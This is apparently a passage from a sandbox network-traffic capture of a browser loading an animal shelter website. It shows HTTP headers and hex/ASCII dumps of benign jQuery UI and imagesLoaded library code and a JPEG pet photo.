                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC734INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69
                                                                                                                                                                                                                                                        Data Ascii: /*! * jQuery UI Autocomplete 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?defi
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 2c 73 2c 6e 2c 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 74 3d 22 74 65 78 74 61 72 65 61 22 3d 3d 3d 65 2c 65 3d 22 69 6e 70 75 74 22 3d 3d 3d 65 3b 74 68 69 73 2e 69 73 4d 75 6c 74 69 4c 69 6e 65 3d 74 7c 7c 21 65 26 26 74 68 69 73 2e 5f 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 76 61 6c 75 65 4d 65 74 68 6f 64 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 74 7c 7c 65 3f 22 76 61 6c 22 3a 22 74 65 78 74 22 5d 2c 74 68 69 73 2e 69 73 4e 65 77 4d 65 6e 75 3d 21 30 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 22 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74
                                                                                                                                                                                                                                                        Data Ascii: te:function(){var i,s,n,e=this.element[0].nodeName.toLowerCase(),t="textarea"===e,e="input"===e;this.isMultiLine=t||!e&&this._isContentEditable(this.element),this.valueMethod=this.element[t||e?"val":"text"],this.isNewMenu=!0,this._addClass("ui-autocomplet
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 6c 65 63 74 65 64 49 74 65 6d 3d 6e 75 6c 6c 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 3d 74 68 69 73 2e 5f 76 61 6c 75 65 28 29 7d 2c 62 6c 75 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 73 65 61 72 63 68 69 6e 67 29 2c 74 68 69 73 2e 63 6c 6f 73 65 28 65 29 2c 74 68 69 73 2e 5f 63 68 61 6e 67 65 28 65 29 7d 7d 29 2c 74 68 69 73 2e 5f 69 6e 69 74 53 6f 75 72 63 65 28 29 2c 74 68 69 73 2e 6d 65 6e 75 3d 6f 28 22 3c 75 6c 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 74 68 69 73 2e 5f 61 70 70 65 6e 64 54 6f 28 29 29 2e 6d 65 6e 75 28 7b 72 6f 6c 65 3a 6e 75 6c 6c 7d 29 2e 68 69 64 65 28 29 2e 61 74 74 72 28 7b 75 6e 73 65 6c 65 63 74 61 62 6c 65 3a 22 6f 6e 22 7d 29 2e
                                                                                                                                                                                                                                                        Data Ascii: tion(){this.selectedItem=null,this.previous=this._value()},blur:function(e){clearTimeout(this.searching),this.close(e),this._change(e)}}),this._initSource(),this.menu=o("<ul>").appendTo(this._appendTo()).menu({role:null}).hide().attr({unselectable:"on"}).
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 52 65 67 69 6f 6e 3d 6f 28 22 3c 64 69 76 3e 22 2c 7b 72 6f 6c 65 3a 22 73 74 61 74 75 73 22 2c 22 61 72 69 61 2d 6c 69 76 65 22 3a 22 61 73 73 65 72 74 69 76 65 22 2c 22 61 72 69 61 2d 72 65 6c 65 76 61 6e 74 22 3a 22 61 64 64 69 74 69 6f 6e 73 22 7d 29 2e 61 70 70 65 6e 64 54 6f 28 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 5b 30 5d 2e 62 6f 64 79 29 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 6c 69 76 65 52 65 67 69 6f 6e 2c 6e 75 6c 6c 2c 22 75 69 2d 68 65 6c 70 65 72 2d 68 69 64 64 65 6e 2d 61 63 63 65 73 73 69 62 6c 65 22 29 2c 74 68 69 73 2e 5f 6f 6e 28 74 68 69 73 2e 77 69 6e 64 6f 77 2c 7b 62 65 66 6f 72 65 75 6e 6c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 28
                                                                                                                                                                                                                                                        Data Ascii: Region=o("<div>",{role:"status","aria-live":"assertive","aria-relevant":"additions"}).appendTo(this.document[0].body),this._addClass(this.liveRegion,null,"ui-helper-hidden-accessible"),this._on(this.window,{beforeunload:function(){this.element.removeAttr(
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 74 28 5b 5d 29 7d 7d 29 7d 29 3a 74 68 69 73 2e 73 6f 75 72 63 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 6f 75 72 63 65 7d 2c 5f 73 65 61 72 63 68 54 69 6d 65 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 73 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 73 65 61 72 63 68 69 6e 67 29 2c 74 68 69 73 2e 73 65 61 72 63 68 69 6e 67 3d 74 68 69 73 2e 5f 64 65 6c 61 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 74 65 72 6d 3d 3d 3d 74 68 69 73 2e 5f 76 61 6c 75 65 28 29 2c 74 3d 74 68 69 73 2e 6d 65 6e 75 2e 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 2c 69 3d 73 2e 61 6c 74 4b 65 79 7c 7c 73 2e 63 74 72 6c 4b 65 79 7c 7c 73 2e 6d 65 74 61 4b 65 79 7c 7c 73 2e 73 68 69 66 74 4b 65
                                                                                                                                                                                                                                                        Data Ascii: tion(){t([])}})}):this.source=this.options.source},_searchTimeout:function(s){clearTimeout(this.searching),this.searching=this._delay(function(){var e=this.term===this._value(),t=this.menu.element.is(":visible"),i=s.altKey||s.ctrlKey||s.metaKey||s.shiftKe
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 73 65 6c 65 63 74 65 64 49 74 65 6d 7d 29 7d 2c 5f 6e 6f 72 6d 61 6c 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 26 26 65 5b 30 5d 2e 6c 61 62 65 6c 26 26 65 5b 30 5d 2e 76 61 6c 75 65 3f 65 3a 6f 2e 6d 61 70 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 7b 6c 61 62 65 6c 3a 65 2c 76 61 6c 75 65 3a 65 7d 3a 6f 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2c 7b 6c 61 62 65 6c 3a 65 2e 6c 61 62 65 6c 7c 7c 65 2e 76 61 6c 75 65 2c 76 61 6c 75 65 3a 65 2e 76 61 6c 75 65 7c 7c 65 2e 6c 61 62 65 6c 7d 29 7d 29 7d 2c 5f 73 75 67 67 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6d 65 6e 75 2e 65 6c 65 6d 65 6e 74 2e
                                                                                                                                                                                                                                                        Data Ascii: selectedItem})},_normalize:function(e){return e.length&&e[0].label&&e[0].value?e:o.map(e,function(e){return"string"==typeof e?{label:e,value:e}:o.extend({},e,{label:e.label||e.value,value:e.value||e.label})})},_suggest:function(e){var t=this.menu.element.
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC957INData Raw: 29 29 7d 2c 5f 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 21 21 65 2e 6c 65 6e 67 74 68 26 26 28 22 69 6e 68 65 72 69 74 22 3d 3d 3d 28 74 3d 65 2e 70 72 6f 70 28 22 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 22 29 29 3f 74 68 69 73 2e 5f 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 28 65 2e 70 61 72 65 6e 74 28 29 29 3a 22 74 72 75 65 22 3d 3d 3d 74 29 7d 7d 29 2c 6f 2e 65 78 74 65 6e 64 28 6f 2e 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2c 7b 65 73 63 61 70 65 52 65 67 65 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 7b 7d 28 29 2a 2b 3f 2e 2c 5c 5c 5c 5e 24 7c 23 5c 73 5d 2f 67 2c 22 5c 5c
                                                                                                                                                                                                                                                        Data Ascii: ))},_isContentEditable:function(e){var t;return!!e.length&&("inherit"===(t=e.prop("contentEditable"))?this._isContentEditable(e.parent()):"true"===t)}}),o.extend(o.ui.autocomplete,{escapeRegex:function(e){return e.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        20192.168.2.44976513.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC388OUTGET /photos/352/c74a3261-0887-4eef-a819-4790e9521a1b.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC555INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 104868
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 22:59:02 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD30380B36B94D
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 1e205e80-f01e-0010-7a36-620df7000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015910Z-156796c549brlzq6hC1EWRqzy000000015gg000000007tpr
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC15829INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b 8b 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0e 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 ca 00 00 00 1b 01 05 00 01 00 00 00 d2 00 00 00 31 01 02 00 07 00 00 00 da 00 00 00 32 01 02 00 14 00 00 00 e1 00 00 00 3c 01 02 00 0e 00 00 00 f5 00 00 00 1a 01 05 00 01 00 00 00 03 01 00 00 1b 01 05 00 01 00 00 00 0b 01 00 00 69 87 04 00 01 00 00 00 13 01 00 00 25 88 04 00 01 00 00 00 62 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 35 20 50 72 6f 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 37 2e 36 2e 31 00
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHExifII*(12<i%bAppleiPhone 15 ProHH17.6.1
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC16384INData Raw: 5a 42 24 c9 cb e3 1c d7 d3 60 b3 1a 92 56 a8 b5 3c bc 46 11 2d 62 f4 3c 6e c6 ea 68 26 55 78 8a af b8 ae c1 a6 4b 9b 05 38 07 15 af e2 6b 5b 03 a7 2c b6 76 cd 19 c6 49 c7 73 5c 0c 17 5e 5c 4f 92 54 f4 af 4d 62 15 b9 99 c7 c8 d3 b1 ba b2 08 ed cc ca e5 70 48 e0 d5 fb 5d 56 19 22 f2 a4 c3 67 8c 1a e7 2d 6f 22 98 bc 4d 20 21 b8 38 3d 2b 1f 52 b7 b9 b1 d4 12 68 24 2f 11 39 18 a9 f6 d1 9f bf 11 eb 1d 19 e9 9a 66 ad 3e 8d ab 0b b8 49 8d 7a f0 71 5c df c4 af 8a eb a5 f8 3f 51 d7 b5 ab 82 96 56 70 97 61 bb af a0 fc 6a a4 b7 ad 37 86 51 d8 62 45 1c 92 2b f3 cf f6 a5 f8 81 3f f6 85 bf 86 ed 66 69 b4 fb 65 2f a8 22 b6 04 8c 7e ea 9f a0 e6 be 77 89 f3 1a 58 4c 3b ac 97 be f4 47 a9 93 e1 a7 88 ab ec 9f c3 bb 3c 72 f7 53 f1 0f c6 2f 8d 97 da d5 d9 6b b9 e5 ba 45 d3 e1
                                                                                                                                                                                                                                                        Data Ascii: ZB$`V<F-b<nh&UxK8k[,vIs\^\OTMbpH]V"g-o"M !8=+Rh$/9f>Izq\?QVpaj7QbE+?fie/"~wXL;G<rS/kE
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC16384INData Raw: d2 09 8a a2 06 52 09 e7 8f f0 af 3b d7 2f 7c b8 26 85 26 0e 4b 90 85 32 76 f2 32 3f c3 d3 a7 6a f3 7f 12 7c 50 d3 74 1d 2b 54 d5 b5 0b f8 e1 b1 b6 b8 19 d8 4f cb c0 0d 95 ee 00 e0 81 c8 20 1e fc 7c e3 e2 cf 8e b0 2e ad a8 41 a5 dc b5 dc 49 72 60 92 15 95 44 91 be c0 ea f1 8c fc c3 b1 1f c5 c8 fa f9 eb 05 39 4f 53 be 15 14 55 c5 f8 d7 ab db 05 b4 49 0c 8d 10 bc d9 39 54 f9 10 bc 6e 54 91 fc 38 7e 00 e8 4b 01 5f 9d 5f 12 bc 48 a3 c5 71 ed 90 cc f7 19 32 b2 0d a2 3d bb 58 e3 db e6 24 7d 2b e8 4f 8b 7e 37 9e 5b e6 4f ed 8b 4b 74 b8 e6 1b 9f b4 8d af 18 31 c8 8d 83 d4 ab c7 9c 1e 4e 18 10 32 71 f9 b1 f1 27 c4 53 c3 73 76 18 44 93 5c 03 94 59 b2 bb 54 86 59 17 92 08 ce f5 fa 67 3c 8a fb 1c b2 11 a7 0d 4f 1b 18 dc e4 78 cf 89 75 db c9 fc 45 a8 49 33 b7 9b 24 b2
                                                                                                                                                                                                                                                        Data Ascii: R;/|&&K2v2?j|Pt+TO |.AIr`D9OSUI9TnT8~K__Hq2=X$}+O~7[OKt1N2q'SsvD\YTYg<OxuEI3$
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC16384INData Raw: ad 5b 99 6f 41 c0 65 cf cc 84 f6 f5 e6 ba b3 13 00 23 90 16 db e9 c8 c7 ad 52 b9 86 21 10 70 76 46 a7 ef 02 49 ff 00 3e d5 12 95 91 a5 35 76 62 d9 da 24 39 79 17 6e 46 62 91 4f 07 f2 ad 31 21 7d 8f 26 77 05 07 39 ea 3f ad 62 cf 27 9b 76 3c 81 b5 77 64 15 fb ae 6b 76 c9 09 68 89 43 b3 23 e4 60 09 06 bc d9 d5 bb 3a e3 14 8b 8d 34 1a 76 8b 36 a3 31 da 91 29 3f 8f 61 5e 19 ab c2 f7 ba ae d7 49 d5 66 1b c3 3f 1b 89 ef 5d cf 8b f5 d8 05 f1 d0 95 b1 e5 af 99 36 de 06 71 95 15 c8 d8 ea cd a8 40 5e fa 68 e2 48 13 09 91 ce 3b 62 be 7f 31 ac a7 3e 55 d0 f5 70 74 b9 63 cc fa 91 4b e1 cb 81 a3 41 73 05 c1 37 88 41 46 ee bc d6 cd dd 96 b3 a8 dc 8b 89 b5 23 73 18 87 6b a6 07 a7 5c 0e d5 6e 3f b4 8b 02 d0 4b 99 64 23 6a 1e e3 d6 aa 69 da 1d e4 1a 8b ac 92 48 21 6f 99 cf
                                                                                                                                                                                                                                                        Data Ascii: [oAe#R!pvFI>5vb$9ynFbO1!}&w9?b'v<wdkvhC#`:4v61)?a^If?]6q@^hH;b1>UptcKAs7AF#sk\n?Kd#jiH!o
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC16384INData Raw: cb 7f 08 f4 aa b0 ea 53 4f 14 1e 69 02 56 52 1c fa 7b fe 35 d1 de 5c d9 be 80 16 65 0e 48 2c e3 18 cb 67 8c 7e 15 ca 69 b6 b2 5f f8 b6 dc 2c 4d f6 76 60 1d f1 d3 14 d1 37 d6 c7 43 05 b0 d5 ec b9 5c 46 8d b5 55 8f 50 3a e2 ba eb 6d 56 cb 4e d0 45 84 f1 88 0a e4 2a 8c 28 22 a3 d4 d2 d3 40 d2 a4 f2 27 47 98 0d f8 51 9f c2 bc 1f 5e 97 c4 fa c6 b7 f6 a8 62 c4 3d 11 8f 18 aa 4a ea e3 be b6 3d 2e 6b 48 c6 a7 25 c5 b8 79 6d 9d b2 ca a7 1d 7b 53 6d 27 89 b5 f1 e4 62 14 53 f3 ee e3 70 f4 a5 f8 6f 77 7b 6f 6f 77 69 ac a2 b3 94 f9 64 7e 70 6b 75 3c 3a 9a 9f f6 85 ed 84 f1 bc c8 08 c2 f6 15 0f b1 68 f4 bf 87 9e 18 b9 f1 d4 d7 56 16 b3 db 58 da 46 3f d2 6f ae 1b 6a a2 e6 be cd d7 fe 08 6b f7 7f b3 6a 49 e0 ed 4f c3 fe 28 4b 3b 62 62 b1 86 f0 a4 b3 90 31 80 c3 8c fb 1c
                                                                                                                                                                                                                                                        Data Ascii: SOiVR{5\eH,g~i_,Mv`7C\FUP:mVNE*("@'GQ^b=J=.kH%ym{Sm'bSpow{oowid~pku<:hVXF?ojkjIO(K;bb1
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC16384INData Raw: dd 99 f6 c7 ec b9 e3 8b 9f 10 fc 2f 87 4c d6 2e 10 dd 5b e1 54 77 db d8 d7 d1 da dc f1 c0 ce 43 70 38 04 1e b5 f8 e1 e0 df 89 da ef c3 9f 89 72 c3 68 1b c9 47 c3 a9 ee 01 af d1 5f 01 f8 f2 d7 e2 6f 83 7e d1 3d c3 58 cd 8c 65 5b 9c fa d6 91 5c da 98 38 f2 b3 ae bd 79 ae 92 51 10 dc 0f 5e 6b e1 9f 8c 36 97 36 bf 16 ef de d2 69 ed ca da 23 b3 23 7c a0 e4 f2 47 e5 5f 5c df c1 e2 1f 09 df 3c c9 30 d4 ec 1c f7 3c e2 be 60 f8 93 13 6a be 28 d6 2f 8c 45 55 ac 00 24 b6 0a 9c f4 f7 af 27 39 a7 28 52 52 f3 fd 0f d4 bc 29 84 6b 66 92 8f f7 7f f6 e4 79 8d 8f 8b 75 19 b5 6b 05 d6 63 f3 da 39 10 24 f0 9c 12 07 f7 87 6a f9 33 f6 c4 f1 84 97 9f b5 37 80 b4 7b fb c6 b6 d1 4d ab bf 9a 0e 41 62 00 00 9e f5 f4 91 b1 ba 83 57 84 f3 1b 0c 6e 24 71 b7 fa d7 ca bf b5 bf 86 5f 53
                                                                                                                                                                                                                                                        Data Ascii: /L.[TwCp8rhG_o~=Xe[\8yQ^k66i##|G_\<0<`j(/EU$'9(RR)kfyukc9$j37{MAbWn$q_S
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC7119INData Raw: f5 ab 94 a2 a0 da df a1 29 49 cd 2e 9d 4e 02 e3 e1 56 97 67 e2 6d 77 51 d4 ad 17 67 fa ab 70 46 39 ef 9c d4 3a 17 c3 0d 02 d7 e1 b5 dd f7 88 e1 11 79 f3 84 b7 70 b8 5e fd ab d1 ee 6e 5f 5b ba 9e 7b bb d6 95 65 66 95 63 63 f7 97 71 6d a4 7b 74 a4 bc 36 9e 33 f8 68 4c d3 34 13 d9 4f fb 8b 64 62 0b 80 73 cf e2 2a a3 56 a7 56 4b 50 7d 0f 93 6f fe 1b a5 cf 8d 24 b3 d2 d9 82 16 04 c6 39 ca 93 fa 71 cd 49 ac f8 0a eb 45 d3 5a de 45 21 03 7e ec cb d4 1e 95 f5 0e 83 a2 ac fe 26 9a 49 52 3b 1b c5 84 05 e7 2c c4 7a 67 d6 ab 6b 9a 64 1e 20 f3 17 53 9c 5b cf 6e 4a 65 40 02 53 d3 8f af 15 db 43 31 ab 4e 4b 5b a3 9e ae 12 13 5d 99 f1 c4 9e 0f d6 34 9b c1 35 e6 9c 44 6c 37 87 8f e6 dc 3d 78 ac 7d 5a 69 2f 2e 92 57 8d a3 82 26 00 e4 10 4d 7e 98 7c 3a d1 f4 6d 1f 42 fb 0f
                                                                                                                                                                                                                                                        Data Ascii: )I.NVgmwQgpF9:yp^n_[{efccqm{t63hL4Odbs*VVKP}o$9qIEZE!~&IR;,zgkd S[nJe@SC1NK[]45Dl7=x}Zi/.W&M~|:mB


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        21192.168.2.449770192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC571OUTGET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 5520
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/imagesloaded.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 11 Aug 2023 18:18:26 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC744INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 35 2e 30 2e 30 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 74 2e 45 76 45 6d 69 74 74 65 72 3d 65 28 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v5.0.0 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(t,e){"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6c 65 74 20 69 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 26 26 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 74 5d 3b 69 66 28 21 69 7c 7c 21 69 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 3d 69 2e 73 6c 69 63 65 28 30 29 2c 65 3d 65 7c 7c 5b 5d 3b 6c 65 74 20 73 3d 74 68 69 73 2e 5f 6f 6e 63 65 45 76 65 6e 74 73 26 26 74 68 69 73 2e 5f 6f 6e 63 65 45 76 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 69 29 7b 73 26 26 73 5b 6e 5d 26 26 28 74 68 69 73 2e 6f 66 66 28 74 2c 6e 29 2c 64 65 6c 65 74 65 20 73 5b 6e 5d 29 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 65 2e 61 6c 6c 4f 66 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                        Data Ascii: t=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;i=i.slice(0),e=e||[];let s=this._onceEvents&&this._onceEvents[t];for(let n of i){s&&s[n]&&(this.off(t,n),delete s[n]),n.apply(this,e)}return this},e.allOff=function(){return
